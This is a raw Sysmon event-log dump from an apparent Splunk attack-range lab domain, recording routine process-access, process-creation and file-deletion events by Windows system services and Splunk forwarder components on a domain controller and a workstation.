07:51:54.171{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.171{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.171{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.171{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-2E7D-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.171{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F49A-60EB-2E7D-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.172{466BC892-F49A-60EB-2E7D-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001048726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001048725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001048781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.932{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=928FAA5DB8BF00BD01F97EB80A00D2BE,SHA256=752ED4C212EDFEC16417BCD06542701C93282B9A371EFDDF3BD73E5C79056F4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.932{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B3D5AE835858E906D1E72577C6F345D4,SHA256=81B9B52F606582EF0BAB76BDDEAC11B5A054E348BD2107479BC5BBEF4E1E03B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.850{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B46235BBF6FB232F05239AC6CB33992C,SHA256=BA61B8D7DC1E29D54D5373E347D10885959FD9A8A449391065E235824CBAC85D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807500Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:55.260{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19087064AD845FEDAA95272526C7C71C,SHA256=4DB61CDE05ADB91824D1743843D9B440D039D51BD08A590530B8341BCA50339C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.186{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F762A63424B8E7E86CC6AF4A06F0FF1,SHA256=D6AF0D3CA45138993C73628F175ECF196F8F406EA7F650F0D30297323FE5166A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 